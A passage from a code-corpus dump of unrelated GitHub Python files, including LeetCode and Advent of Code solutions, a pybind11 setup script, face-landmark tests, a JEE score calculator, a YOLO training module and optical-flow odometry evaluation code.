Solution()\ns.findKthNumber(20,3)","repo_name":"azhu51/leetcode-practice","sub_path":"bytedance_corpus/hard_440.py","file_name":"hard_440.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23241023035","text":"# 给你一个整数数组 coins 表示不同面额的硬币,另给一个整数 amount 表示总金额。\n#\n# 请你计算并返回可以凑成总金额的硬币组合数。如果任何硬币组合都无法凑出总金额,返回 0 。\n#\n# 假设每一种面额的硬币有无限个。 \n#\n# 题目数据保证结果符合 32 位带符号整数。\n#\n\n# 外层for循环遍历物品(钱币),内层for遍历背包(金钱总额),此时是组合数\n# 外层for循环遍历背包(金钱总额),内层for遍历物品(钱币),此时是排列数\namount = 5\ncoins = [1, 2, 5]\n\ndef change(amount, coins):\n dp = [0] * (amount + 1)\n dp[0] = 1\n\n for i in range(len(coins)):\n for j in range(coins[i], amount + 1):\n dp[j] += dp[j - coins[i]]\n return dp[-1]\n\nprint(change(amount, coins))","repo_name":"vandeppce/algorithm","sub_path":"10.dynamic programming/518*Change.py","file_name":"518*Change.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40931525482","text":"class Solution:\n def numUniqueEmails(self, emails: List[str]) -> int:\n emails = set(emails)\n\n address = set()\n for e in emails:\n local,domain = e.split('@')\n name = (local.split('+')[0].replace('.','') , domain)\n address.add(name)\n \n return len(address)","repo_name":"Koheki/TIS","sub_path":"2022-12/2022-12-03/LC929_2.py","file_name":"LC929_2.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35482747554","text":"#!/usr/bin/env python3\nfrom setuptools import setup\nfrom distutils.core import setup, Extension\nimport os\nfrom get_include_paths import *\n\nmodule = Extension('setup_test', \n sources = [\n 'sub/setup_pybind11.cpp'\n ],\n include_dirs=[\n get_pybind_include(user=True),\n get_eigen_include(user=True),\n get_boost_include(user=True),\n ],\n extra_compile_args=['-std=c++11', '-fpermissive'],\n )\n \nsetup (name = 'setup_test',\n version = '1.0',\n description = 'Intersections is a library to find the aric of two data sets.',\n install_requires=[\n 'wget >= 3.1',\n 'pybind11',\n ],\n ext_modules = [module])","repo_name":"yuan-yen/Pybind11BuildExample","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32939551622","text":"from collections import defaultdict\nfrom itertools import combinations\nfrom pathlib import Path\nfrom typing import Iterable, Iterator\n\nfrom more_itertools import one\n\nVector = tuple[int, int, int]\nPair = tuple[Vector, Vector]\nScanners = dict[int, list[Vector]]\n\n\ndef parse_scanners() -> Scanners:\n scanners: Scanners = Scanners()\n\n with open(Path(__file__).parent / \"input.txt\") as file:\n for line in file:\n data = line.split()\n if len(data) == 4:\n scanner_id = int(data[2])\n scanners[int(scanner_id)] = []\n elif len(data) == 1:\n x, y, z = tuple(map(int, data[0].split(\",\")))\n scanners[scanner_id].append((x, y, z))\n return scanners\n\n\ndef distance(a: Vector, b: Vector) -> float:\n x1, y1, z1 = a\n x2, y2, z2 = b\n return ((x2 - x1) ** 2 + (y2 - y1) ** 2 + (z2 - z1) ** 2) ** 0.5\n\n\ndef manhattan_distance(a: Vector, b: Vector) -> float:\n x1, y1, z1 = a\n x2, y2, z2 = b\n return abs(x1 - x2) + abs(y1 - y2) + abs(z1 - z2)\n\n\ndef roll(v: Vector) -> Vector:\n return v[0], v[2], -v[1]\n\n\ndef turn(v: Vector) -> Vector:\n return -v[1], v[0], v[2]\n\n\ndef generate_rotations(v: Vector) -> Iterator[Vector]:\n\n for _ in range(2):\n for _ in range(3): # Yield RTTT 3 times\n v = roll(v)\n yield v # Yield R\n for _ in range(3): # Yield TTT\n v = turn(v)\n yield v\n v = roll(turn(roll(v))) # Do RTR\n\n\ndef find_everything() -> tuple[set[Vector], set[Vector]]:\n scanners = parse_scanners()\n\n distances = dict[int, dict[float, Pair]]()\n\n base_beacons = scanners[0]\n known_scanners = {0}\n known_beacons = set(base_beacons)\n distances[0] = {}\n for a, b in combinations(known_beacons, 2):\n distances[0][distance(a, b)] = (a, b)\n known_scanner_locations = {(0, 0, 0)}\n\n while len(known_scanners) < len(scanners):\n for scanner, beacons in scanners.items():\n if scanner in known_scanners:\n continue\n single_matches = match_to_known_beacons(beacons, distances.values())\n if single_matches is None:\n continue\n\n rotators = {beacon: generate_rotations(beacon) for beacon in beacons}\n\n for _ in range(24):\n offsets = set[Vector]()\n rotated_beacons = list[Vector]()\n\n for beacon, rotator in rotators.items():\n xx, yy, zz = next(rotator)\n rotated_beacons.append((xx, yy, zz))\n if single_matches.get(beacon):\n x, y, z = single_matches[beacon]\n offsets.add((x - xx, y - yy, z - zz))\n\n if len(offsets) == 1:\n xx, yy, zz = one(offsets)\n known_scanner_locations.add((xx, yy, zz))\n known_scanners.add(scanner)\n new_beacons = {\n (x + xx, y + yy, z + zz) for (x, y, z) in rotated_beacons\n }\n distances[scanner] = {}\n for a, b in combinations(new_beacons, 2):\n distances[scanner][distance(a, b)] = (a, b)\n known_beacons.update(new_beacons)\n break\n return known_beacons, known_scanner_locations\n\n\ndef match_to_known_beacons(\n beacons: list[Vector], distances: Iterable[dict[float, Pair]]\n) -> None | dict[Vector, Vector]:\n current_distances = dict[float, Pair]()\n for a, b in combinations(beacons, 2):\n current_distances[distance(a, b)] = a, b\n for o_distances in distances:\n matches = defaultdict[Vector, set[Vector]](set)\n for d, (a, b) in current_distances.items():\n if o_distances.get(d):\n if not matches[a]:\n matches[a].update(o_distances[d])\n else:\n matches[a] = matches[a].intersection(o_distances[d])\n if not matches[b]:\n matches[b].update(o_distances[d])\n else:\n matches[b] = matches[b].intersection(o_distances[d])\n single_matches = {k: one(v) for k, v in matches.items() if len(v) == 1}\n if len(single_matches) >= 12:\n return single_matches\n return None\n\n\ndef resolve() -> None:\n beacons, scanners = find_everything()\n print(len(beacons))\n print(max(manhattan_distance(a, b) for a, b in combinations(scanners, 2)))\n\n\nif __name__ == \"__main__\":\n resolve()\n","repo_name":"rbusquet/advent-of-code","sub_path":"aoc_2021/day19.py","file_name":"day19.py","file_ext":"py","file_size_in_byte":4562,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"42857057171","text":"import os\nimport logging\nimport platform\nimport importlib\nimport inspect\nimport sys\n\ndef execute_action(working_action, entities, shared_data, output_widget=None, chat_prompt=None):\n \"\"\"\n Executes the specified action based on the provided action string and entities.\n\n Args:\n action (str): The action string to execute.\n entities (dict): The entities extracted from the user input.\n output_widget (QTextEdit, optional): The QTextEdit widget used for displaying output. Defaults to None.\n chat_prompt (ChatPrompt, optional): The ChatPrompt instance used for interacting with the user. Defaults to None.\n \"\"\"\n os_name = platform.system()\n logging.debug(f\"action_parts: intent,action received: {working_action}\")\n logging.debug(f\"action_parts: {working_action}\")\n # Set to true for testing new action_parts. When set true will only run that action and no others.\n\n\n # Construct the action module name with subfolder check\n action_module_name = f\"custom_actions.{working_action[1]}.{working_action[1]}_executor\"\n\n # Check for subfolders in custom_actions\n subfolder_names = [\"file_actions\", \"system_actions\", \"misc_actions\", \"web_actions\", \"word_actions\", \"debug_actions\" ]\n for subfolder_name in subfolder_names:\n subfolder_check = f\"custom_actions.{subfolder_name}.{working_action[1]}.{working_action[1]}_executor\"\n try:\n print(subfolder_check)\n action_module = importlib.import_module(subfolder_check)\n subfolder_module_name = f\"custom_actions.{subfolder_name}.{working_action[1]}.{working_action[1]}_executor\"\n print(\"module found\")\n break\n except ModuleNotFoundError:\n pass\n \n\n # Dynamically load the action executor module based on the action_module_name\n action_module = importlib.import_module(subfolder_module_name)\n\n # Get the custom action function from the loaded module\n action_function_name = f\"{working_action[1]}_execution\"\n action_function = getattr(action_module, action_function_name)\n\n # Get the parameters of the custom action function\n action_signature = inspect.signature(action_function)\n action_args = []\n\n for param_name, param in action_signature.parameters.items():\n if param_name == 'output_widget':\n action_args.append(output_widget)\n elif param_name == 'entities':\n action_args.append(entities)\n elif param_name == 'shared_data':\n action_args.append(shared_data)\n elif param_name == 'chat_prompt':\n action_args.append(chat_prompt)\n elif param_name == 'os_name':\n action_args.append(os_name)\n elif param_name == 'working_action':\n action_args.append(working_action[0])\n\n # Execute the action function with the prepared arguments\n action_function(*action_args)","repo_name":"scott-ca/mykros_framework","sub_path":"custom_actions/execute_actions.py","file_name":"execute_actions.py","file_ext":"py","file_size_in_byte":2888,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"25285070540","text":"import os\ntry:\n from bs4 import BeautifulSoup\nexcept:\n print('[!] BeautifulSoup4 not found')\n exit()\n\ndef checkPresent():\n if 'nt' in os.name and os.path.exists('Data\\\\Response.html') and os.path.exists('Data\\\\AnswerKey.html'):\n print('Found Response and AnswerKey.')\n elif 'posix' in os.name and os.path.exists('Data/Response.html') and os.path.exists('Data/AnswerKey.html'):\n print('Found Response and AnswerKey.')\n else:\n print(\"[ERROR] Response and/or AnswerKey Not Found!!\")\n input()\n exit(-1)\n\nclass Question:\n def __init__(self, queid, ans):\n self.id = queid\n self.ans = ans\n\n def check(self, res:str):\n self.res = str(res)\n\n if len(self.ans) == 11:\n if '-' in self.res:\n return None\n elif self.res == self.ans:\n return '4'\n else:\n # print('here')\n return '-1'\n else:\n if '-' in self.res:\n return None\n elif self.res == self.ans:\n return '4'\n else:\n return '0'\n\nclass Result:\n def __init__(self, subject=None):\n self.subject = subject\n\n self.ques = {}\n\n self.correct_mcq = 0\n self.correct_num = 0\n self.incorrect_mcq = 0\n self.incorrect_num = 0\n self.unsolved = 0\n\n self.mks = 0\n self.totalMks = 100\n\n def addQue(self, queid, ans):\n self.ques[queid] = Question(queid, ans)\n\n \n def check(self,queid, res:str):\n a = self.ques[str(queid)].check(res) # couldn't think of better name :(\n res = str(res)\n if a != None:\n self.mks += int(a)\n # print(int(a))\n if a=='4':\n if len(res) == 11:\n self.correct_mcq += 1\n else:\n #print(len(res))\n self.correct_num += 1\n else:\n if len(res) == 11:\n self.incorrect_mcq += 1\n else:\n self.incorrect_num += 1\n elif a == None:\n self.unsolved += 1\n\n def show(self):\n if self.subject:\n print(f'Subject: {self.subject}')\n else:\n print('Total:')\n\n print(f'Correct(MCQ, Num): {self.correct_mcq}, {self.correct_num} = {self.correct_mcq + self.correct_num}')\n print(f'Incorrect(MCQ, Num): {self.incorrect_mcq}, {self.incorrect_num} = {self.incorrect_mcq + self.incorrect_num}')\n print(f'Unsolved: {self.unsolved}')\n print(f'Score: {self.mks}\\\\{self.totalMks}')\n\n def __add__(*args):\n ret = Result()\n ret.totalMks = 0\n\n for i in ['incorrect_mcq', 'incorrect_num', 'correct_mcq', 'correct_num', 'unsolved', 'mks', 'totalMks']:\n for arg in args:\n cmd = f'ret.{i} += arg.{i}'\n exec(cmd)\n\n \n return ret\n\n\ndef checkResponse():\n global phy_result, chem_result, math_result\n\n if 'nt' in os.name:\n dir = 'Data\\\\'\n elif 'posix' in os.name:\n dir = 'Data/'\n\n with open(dir+'Response.html') as response:\n page = response.readlines()\n\n soup = BeautifulSoup(''.join(page), 'html.parser')\n\n section_list = soup.findAll('div', {'class': 'section-cntnr'})\n\n responses = {}\n\n for i in range(6):\n section = section_list[i]\n question_list = section.findAll('table', {'class': 'menu-tbl'})\n question_data = section.findAll('table', {'class': 'questionRowTbl'})\n\n for j in range(len(question_list)):\n question = question_list[j]\n tbl_data = question.findAll('tr')\n queid = str(tbl_data[1].findAll('td')[1].text)\n\n if i%2==0:\n myop = tbl_data[7].findAll('td')[1].text\n try:\n opid = int(myop) + 1\n myres = str(tbl_data[opid].findAll('td')[1].text)\n except ValueError:\n myres = ' -- '\n \n\n else:\n question = question_data[j]\n myres = question.findAll('td')[5].text\n try:\n float(myres)\n except ValueError:\n myres = ' -- '\n\n if i==0 or i==1:\n phy_result.check(queid, myres)\n elif i==2 or i==3:\n chem_result.check(queid, myres)\n elif i==4 or i==5:\n math_result.check(queid, myres)\n\n\ndef getAnswers():\n global phy_result, chem_result, math_result\n\n if 'nt' in os.name:\n dir = 'Data\\\\'\n elif 'posix' in os.name:\n dir = 'Data/'\n\n with open(dir+'AnswerKey.html') as response:\n page = response.readlines()\n\n soup = BeautifulSoup(''.join(page), 'html.parser')\n\n answers = {\n 'Physics' : {},\n 'Chemistry' : {},\n 'Maths' : {}\n }\n\n answer_tbl = soup.findAll('table')[1]\n que_str = 'ctl00_LoginContent_grAnswerKey_ctl{:02d}_lbl_QuestionNo'\n ans_str = 'ctl00_LoginContent_grAnswerKey_ctl{:02d}_lbl_RAnswer'\n\n count = 0\n\n for i in range(2, 92):\n que = que_str.format(i)\n ans = ans_str.format(i)\n\n queid = str(soup.find('span', {'id' : que}).text)\n answer = str(soup.find('span', {'id': ans}).text)\n\n if (i-2)<30:\n # sub = 'Physics'\n phy_result.addQue(queid, answer)\n elif (i-2)>29 and (i-2)<60:\n # sub = 'Chemistry'\n chem_result.addQue(queid, answer)\n else:\n # sub = 'Maths'\n math_result.addQue(queid, answer)\n\ndef main():\n checkPresent()\n \n '''phy_result = Result('Physics')\n chem_result = Result('Chemistry')\n math_result = Result('Maths')'''\n\n getAnswers()\n checkResponse()\n\n #phy_result.show()\n #print(phy_result.ques)\n \n\nif __name__=='__main__':\n phy_result = Result('Physics')\n chem_result = Result('Chemistry')\n math_result = Result('Maths')\n \n checkPresent()\n print()\n\n getAnswers()\n checkResponse()\n total = phy_result + chem_result + math_result\n\n phy_result.show()\n print()\n chem_result.show()\n print()\n math_result.show()\n print()\n total.show()","repo_name":"shreyash-b/jee-score-calculator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3703735891","text":"# -*- coding: utf-8 -*-\nimport os\n\nimport pytest\nimport numpy as np\n\nfrom pfla.img_prep import ImgPrep\nfrom pfla.face_detect import FaceDetect\nfrom pfla.annotate import FaceAnnotate\nfrom pfla.metrics import Metrics\nfrom pfla.linear import Linear\nfrom pfla.logger import Logger\n\nCURRENT_PATH = os.path.dirname(os.path.abspath(__file__))\nPATH_DATA_TEST = os.path.join(CURRENT_PATH, \"data\")\n\n@pytest.fixture\ndef prep_fxt():\n img_path = os.path.join(PATH_DATA_TEST, \"m01.jpg\")\n dir_path = PATH_DATA_TEST\n\n return ImgPrep(img_path), ImgPrep(dir_path)\n\ndef test_prep(prep_fxt):\n single_im, multiple_im = prep_fxt\n\n s_array, s_index = single_im.prepare_file()\n assert len(s_index) == 1\n assert isinstance(s_array, np.ndarray)\n\n m_array, m_index = multiple_im.prepare_dir()\n assert len(m_index) == 5\n assert isinstance(m_array, np.ndarray)\n\n@pytest.fixture\ndef detect_fxt(prep_fxt):\n single_im, multiple_im = prep_fxt\n s_array, s_index = single_im.prepare_file()\n m_array, m_index = multiple_im.prepare_dir()\n\n return FaceDetect(s_array, True), FaceDetect(m_array, False)\n\ndef test_detect(detect_fxt):\n single_det, multiple_det = detect_fxt\n\n s_box = single_det.mtcnn_box()\n assert len(s_box) == 1\n\n m_box = multiple_det.mtcnn_box()\n assert len(m_box) == 5\n\n@pytest.fixture\ndef annotate_fxt(prep_fxt, detect_fxt):\n single_im, multiple_im = prep_fxt\n s_array, s_index = single_im.prepare_file()\n m_array, m_index = multiple_im.prepare_dir()\n\n single_det, multiple_det = detect_fxt\n\n s_box = single_det.mtcnn_box()\n m_box = multiple_det.mtcnn_box()\n\n return FaceAnnotate(s_array, s_box, True), FaceAnnotate(m_array, m_box, False)\n\n\ndef test_annotate(annotate_fxt):\n single_annotate, multiple_annotate = annotate_fxt\n\n s_ldmk = single_annotate.get_ldmk()\n assert isinstance(s_ldmk, np.ndarray)\n assert np.shape(s_ldmk) == (68, 2)\n\n m_ldmk = multiple_annotate.get_ldmk()\n assert isinstance(m_ldmk, np.ndarray)\n assert np.shape(m_ldmk) == (5, 68, 2)\n\n@pytest.fixture\ndef metrics_fxt(annotate_fxt):\n single_annotate, multiple_annotate = annotate_fxt\n\n s_ldmk = single_annotate.get_ldmk()\n m_ldmk = multiple_annotate.get_ldmk()\n\n return Metrics(s_ldmk, True), Metrics(m_ldmk, False),\n\ndef test_metrics(metrics_fxt):\n single_metrics, multiple_metrics = metrics_fxt\n\n s_metrics = single_metrics.compute_metrics()\n assert isinstance(s_metrics, np.ndarray)\n assert np.shape(s_metrics) == (4,)\n\n m_metrics = multiple_metrics.compute_metrics()\n assert isinstance(m_metrics, np.ndarray)\n assert np.shape(m_metrics) == (4, 5)\n\ndef test_linear():\n a = np.array([1,1])\n b = np.array([2,2])\n\n ln = Linear(a[0], a[1], b[0], b[1])\n dist = ln.euc_dist()\n\n assert dist == np.sqrt(2)\n\ndef test_logger():\n v_logging = Logger(True)\n nv_logging = Logger(False)\n\n assert v_logging.info('test message of level info', 0) == None\n assert nv_logging.info('test message of level warning', 1) == None\n","repo_name":"maxrousseau/pfla","sub_path":"pfla/tests/test_integration.py","file_name":"test_integration.py","file_ext":"py","file_size_in_byte":3025,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"25762881786","text":"\"\"\"A collection of scripts that can be easily called from the command line.\"\"\"\n\n\nfrom PyQt5.QtWidgets import QApplication\nfrom sys import argv as sys_argv\nfrom commandline import openfile\nfrom typing import Callable as C\nfrom winnotify import PlaySound\nfrom subprocess import run\nfrom pathlib import Path\nfrom re import sub\nimport logging\n\nfrom argparse import (\n ArgumentParser as ArgParser,\n RawTextHelpFormatter\n)\nfrom textwrap import (\n dedent,\n fill\n)\nfrom . import src\n\n\nclass main:\n pKwargs = dict(add_help=False,\n formatter_class=RawTextHelpFormatter)\n hArgs = ['-h', '--help']\n hKwargs = dict(help=\"show this help message\",\n action='store_true')\n wArgs = ['-w', '--window']\n wKwargs = dict(help=\"redirect help and errors to a new window\",\n action='store_true')\n console: bool\n dirname: Path\n subs: dict[C, ArgParser]\n parser: ArgParser\n\n def __init__(self):\n # init vars\n app = QApplication(sys_argv)\n self.dirname = Path(__file__).parent\n self.console = False\n self.subs = dict()\n err = False\n # setup logging\n logfile = self.dirname.joinpath('lib', 'logging.log')\n logging.basicConfig(filename=logfile,\n filemode='w',\n level=logging.DEBUG,\n format='[%(asctime)s] %(levelname)s: %(module)s.%(funcName)s\\n%(message)s\\n',\n datefmt='%m/%d/%Y %I:%M:%S%p')\n try:\n self.buildParser()\n self.runScript()\n except Exception:\n logging.exception('')\n err = True\n raise\n finally:\n if logfile.read_text():\n if err:\n PlaySound()\n if self.console:\n openfile(logfile, 'min')\n else:\n print(logfile.read_text())\n run(['powershell', 'pause'])\n # app.exec()\n\n def buildParser(self) -> None:\n # create parser\n self.parser = ArgParser(prog=self.dirname.name,\n description=__doc__,\n **self.pKwargs)\n self.parser.add_argument(*self.hArgs, **self.hKwargs)\n self.parser.add_argument(*self.wArgs, **self.wKwargs)\n self.subpars = self.parser.add_subparsers(\n help=f\"METHOD DESCRIPTION:\\n{'='*20}\")\n # create help\n functions = {f: getattr(src, f) for f in src.__all__}\n for name, script in functions.items():\n self.createHelp(name, script)\n\n def createHelp(self, name: str, script):\n def wrap(txt: str) -> str:\n outstr = str()\n for line in dedent(txt).split('\\n'):\n outstr += fill(text=line,\n width=75)\n outstr += '\\n'\n return outstr\n subpar = self.subpars.add_parser(\n name=name,\n description=wrap(script.__doc__),\n help=wrap(script.__doc__),\n **self.pKwargs)\n subpar.add_argument(*self.hArgs, **self.hKwargs)\n subpar.add_argument(*self.wArgs, **self.wKwargs)\n subpar.add_argument('-a', '--args',\n help=wrap(sub(pattern=r'Parameters.*\\n\\s*',\n repl='',\n string=script.__init__.__doc__)),\n nargs='+')\n subpar.set_defaults(func=script)\n self.subs[script] = subpar\n\n def runScript(self):\n all_args = self.parser.parse_args()\n self.console = all_args.window\n if all_args.help:\n try:\n logging.info(self.subs[all_args.func].format_help())\n except Exception:\n logging.info(self.parser.format_help())\n else:\n args = all_args.args or list()\n all_args.func(*args)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Cryden13/SystemScripts","sub_path":"__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":4033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16819624437","text":"from pytorch_lightning.core.lightning import LightningModule\nimport torch\nimport torch.nn as nn\n\nfrom pathlib import Path\n\nfrom visualize import save_res_im\n\n\nclass Yolo(LightningModule):\n\n def __init__(self, net, loss_func, train_root, val_root, target_file, lr, epochs, pred_classes,\n batch_size, im_save, output_size):\n super().__init__()\n self.net = net\n # self.criterion = loss_func\n self.train_root = train_root\n self.val_root = val_root,\n self.target_file = target_file\n self.lr = lr\n self.epochs = epochs\n self.pred_classes = pred_classes\n self.batch_size = batch_size\n self.output_size = output_size\n\n # self.im_save = Path(\"/res/res_im\").mkdir(exist_ok=True, parents=True)\n self.im_save = Path(\"/res/res_im\")\n self.im_save.mkdir(exist_ok=True, parents=True)\n self.now_epoch = 1\n\n def forward(self, x):\n return self.net(x)\n\n def training_step(self, batch, batch_idx):\n x, y = batch\n logits = self(x)\n # loss = self.criterion(logits, y)\n loss = nn.MSELoss()(logits, y)\n return loss\n\n def validation_step(self, batch, batch_idx):\n x, y = batch\n logits = self(x)\n # loss = self.criterion(logits, y)\n loss = nn.MSELoss()(y, logits)\n save_res_im(x, logits, y, \"res_{}.jpg\".format(self.now_epoch), str(self.im_save), self.output_size)\n self.now_epoch += 1\n self.log(\"val_loss\", loss)\n return loss\n\n def configure_optimizers(self):\n return torch.optim.Adam(self.net.parameters(), lr=self.lr)\n","repo_name":"bokutotu/yolov1","sub_path":"yolov1/yolo.py","file_name":"yolo.py","file_ext":"py","file_size_in_byte":1630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18138751975","text":"import numpy as np\nimport os\nfrom PIL import Image\nimport os\nimport math\nfrom matplotlib.colors import hsv_to_rgb\nimport random\n\nfrom Matrix import Matrix\n\n\ndef evaluate(file, file_err, old_R, old_t, matrix_input, num_iters, image_results, mode):\n img_gray = image_results[0]\n img_array = image_results[1]\n flow_u_array = image_results[2]\n flow_v_array = image_results[3]\n\n height = img_gray.shape[1]\n width = img_gray.shape[2]\n\n #create uv image and mask\n mask_array_non_zero = np.logical_and(np.logical_and(abs(flow_u_array) > 0.001, abs(flow_v_array) > 0.001),\n img_array > 0.001)\n\n boundry_pixels = 50\n mask_out_boundry = np.zeros((height, width), dtype=bool)\n mask_out_boundry[boundry_pixels:height - boundry_pixels, boundry_pixels:width-boundry_pixels] = True\n mask_out_boundry = mask_out_boundry.flatten()\n mask = np.logical_and(mask_array_non_zero, mask_out_boundry)\n\n img_v, img_u, R_center = _calculate_rotation_midpoint(height, width, flow_v_array, flow_u_array, mask)\n\n matrix_flow_v = img_v + flow_v_array\n matrix_flow_u = img_u - flow_u_array\n\n matrix_im1 = []\n matrix_im2 = []\n\n for idx, val in enumerate(mask):\n if val:\n matrix_im1.append([img_v[idx], img_u[idx], 0])\n matrix_im2.append([matrix_flow_v[idx], matrix_flow_u[idx], 0])\n\n matrix_im1 = np.transpose(np.asarray(matrix_im1))\n matrix_im2 = np.transpose(np.asarray(matrix_im2))\n\n best_model = ransac(matrix_im1, matrix_im2)\n [R, c, t] = best_model\n\n R_now = rotationMatrixToEulerAngles(R)[2]\n t_x = t[0] * np.cos(old_R) - t[1] * np.sin(old_R)\n t_y = -(t[0] * np.sin(old_R) + t[1] * np.cos(old_R))\n\n R = old_R + R_now\n t_rotated = [(t_x+old_t[0]).item(0), (t_y+old_t[1]).item(0)]\n\n if matrix_input is not None:\n delta_t_x, delta_t_y, delta_R_is = calculate_err(matrix_input, num_iters, R_now, t, file, file_err, t_x, t_y, t_rotated)\n else:\n mode = 'estimated'\n\n output_flow = np.zeros([height, width, 2])\n #Save flow without estimated self movement\n flow_u_without=[]\n flow_v_without=[]\n if mode == \"estimated\":\n t_1 = t[1] * 10.0\n t_0 = t[0] * 10.0\n flow_u_without = (flow_u_array - t_1 + img_u * np.cos(R_now) + img_v * np.sin(R_now) - img_u) * mask_array_non_zero\n flow_v_without = (flow_v_array - t_0 + img_u * np.sin(R_now) - img_v * np.cos(R_now) + img_v) * mask_array_non_zero\n elif mode == 'real':\n #Save flow without real self movement\n t_0 = (-(delta_t_x.item(0) * np.cos(old_R) - delta_t_y.item(0) * np.sin(old_R))) * 10.0\n t_1 = (delta_t_x.item(0) * np.sin(old_R) + delta_t_y.item(0) * np.cos(old_R)) * 10.0\n flow_u_without = (flow_u_array - t_1 + img_u * np.cos(delta_R_is) + img_v * np.sin(delta_R_is) - img_u) * mask_array_non_zero\n flow_v_without = (flow_v_array - t_0 + img_u * np.sin(delta_R_is) - img_v * np.cos(delta_R_is) + img_v) * mask_array_non_zero\n else:\n print('Should choose between real and estimated')\n\n\n #write image and odometry\n file.write(\"0 0 0 \" + str(t_rotated[0]) + \" 0 0 0 \" + str(t_rotated[1]) + \" 0 \" + str(R_now) + \" \" + str(t[0]) + \" \" + str(t[1]) + \"\\n\")\n\n output_flow[:, :, 0] = flow_u_without.reshape((height, width))\n output_flow[:, :, 1] = flow_v_without.reshape((height, width))\n\n img_flow_rgb = (_convert_flow_to_rgb(output_flow) * 255.0).astype(np.uint8)\n img_flow_rgb = Image.fromarray(img_flow_rgb)\n\n directory = '/home/zhang/flow_without_' + mode + '_motion/'\n if not os.path.exists(directory):\n os.makedirs(directory)\n img_flow_rgb.save(directory + str(num_iters) + '_output_flow.jpeg')\n\n return R, t_rotated\n\n\ndef calculate_err(matrix_input, num_iters, R_now, t, file, file_err, t_x, t_y, t_rotated):\n #read now and previous groundtruth\n matrix_gt = matrix_input.return_matrix(num_iters + 3)\n matrix_gt_pr = matrix_input.return_matrix(num_iters + 2)\n R_gt = matrix_gt[:,0:3]\n t_gt = matrix_gt[:,3]\n R_gt_pr = matrix_gt_pr[:,0:3]\n t_gt_pr = matrix_gt_pr[:,3]\n R_gt = rotationMatrixToEulerAngles(R_gt)[1]\n R_gt_pr = rotationMatrixToEulerAngles(R_gt_pr)[1]\n\n delta_R_is = R_gt - R_gt_pr\n delta_t_x = t_gt[2] - t_gt_pr[2]\n delta_t_y = -(t_gt[0] - t_gt_pr[0])\n\n R_err = R_now - delta_R_is\n t_x_err = t_x - delta_t_x.item(0)\n t_y_err = t_y - delta_t_y.item(0)\n\n file_err.write(str(R_err) + \" \" + str(t_x_err) + \" \" + str(t_y_err) + \"\\n\")\n return delta_t_x, delta_t_y, delta_R_is\n\n\ndef _convert_flow_to_rgb(flow):\n n = 2\n max_flow = 20\n flow_u = flow[:,:,0]\n flow_v = flow[:,:,1]\n mag = np.sqrt(np.sum(np.square(flow), axis=2))\n angle = np.arctan2(flow_v, flow_u)\n\n im_h = np.mod(angle / (2 * np.pi) + 1.0, 1.0)\n im_s = np.clip(mag * n / max_flow, 0, 1)\n im_v = np.clip(n - im_s, 0, 1)\n\n im_hsv = np.zeros((flow.shape[0], flow.shape[1], 3))\n im_hsv[:, :, 0] = im_h\n im_hsv[:, :, 1] = im_s\n im_hsv[:, :, 2] = im_v\n im = hsv_to_rgb(im_hsv)\n\n return im\n\n\ndef _ralign(X,Y):\n m, n = X.shape\n\n mx = X.mean(1)\n my = Y.mean(1)\n Xc = X - np.tile(mx, (n, 1)).T\n Yc = Y - np.tile(my, (n, 1)).T\n\n sx = np.mean(np.sum(Xc*Xc, 0))\n sy = np.mean(np.sum(Yc*Yc, 0))\n\n Sxy = np.dot(Yc, Xc.T) / n\n\n U,D,V = np.linalg.svd(Sxy,full_matrices=True,compute_uv=True)\n V=V.T.copy()\n #print U,\"\\n\\n\",D,\"\\n\\n\",V\n r = np.rank(Sxy)\n d = np.linalg.det(Sxy)\n S = np.eye(m)\n if r > (m - 1):\n if ( np.det(Sxy) < 0 ):\n S[m, m] = -1;\n elif (r == m - 1):\n if (np.det(U) * np.det(V) < 0):\n S[m, m] = -1\n else:\n R = np.eye(2)\n c = 1\n t = np.zeros(2)\n return R,c,t\n\n R = np.dot(np.dot(U, S), V.T)\n\n c = np.trace(np.dot(np.diag(D), S)) / sx\n t = my - c * np.dot(R, mx)\n\n return R, c, t*0.1\n\n\n# Checks if a matrix is a valid rotation matrix.\ndef _isRotationMatrix(R):\n Rt = np.transpose(R)\n shouldBeIdentity = np.dot(Rt, R)\n I = np.identity(3, dtype=R.dtype)\n n = np.linalg.norm(I - shouldBeIdentity)\n return n < 1e-6\n\n\n# Calculates rotation matrix to euler angles\n# The result is the same as MATLAB except the order\n# of the euler angles ( x and z are swapped ).\ndef rotationMatrixToEulerAngles(R):\n assert (_isRotationMatrix(R))\n\n sy = math.sqrt(R[0, 0] * R[0, 0] + R[1, 0] * R[1, 0])\n\n singular = sy < 1e-6\n\n if not singular:\n x = math.atan2(R[2, 1], R[2, 2])\n y = math.atan2(-R[2, 0], sy)\n z = math.atan2(R[1, 0], R[0, 0])\n else:\n x = math.atan2(-R[1, 2], R[1, 1])\n y = math.atan2(-R[2, 0], sy)\n z = 0\n\n return np.array([x, y, z])\n\n\ndef _calculate_rotation_midpoint(height, width, flow_v_array, flow_u_array, mask):\n flow_none_zeros = []\n for idx, val in enumerate(mask):\n if val:\n flow_none_zeros.append([flow_v_array[idx], flow_u_array[idx]])\n\n flow_none_zeros = 